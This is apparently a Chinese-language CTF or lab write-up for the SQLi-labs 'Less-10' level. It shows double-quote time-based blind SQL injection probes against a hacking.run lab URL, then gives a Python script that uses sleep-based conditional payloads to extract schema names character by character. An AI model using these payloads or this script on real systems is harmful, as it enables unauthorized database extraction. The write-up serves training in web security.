Less-10

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

 1.判断是否存在注入

https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1'

正常回显

https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1"

正常回显

https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1' and sleep(3) --+

正常回显

https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+

延时回显 => 存在注入

2.判断参数类型

 https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1 and sleep(3) --+

正常回显

https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+

延迟回显 => 字符型

3.进行参数闭合

https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+

延时回显 => 闭合成功

4.进行时间盲注

python脚本

import requests
import time

url = 'https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1"

database = 'select schema_name from information_schema.schemata'

tables = 'select table_name from information_schema.tables where table_schema=database()'

column = 'select column_name from information_schema.columns where table_name="table_name"'

result = ''
for i in range(1, 30) :
    for j in range(48, 122) :
        payload = '" and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),1)--+'.format(database, i, j)
        stime = time.time()
        r = requests.get(url + payload)
        etime = time.time()
        if etime - stime >= 2 :
            result += chr(j)
            print(result)
            break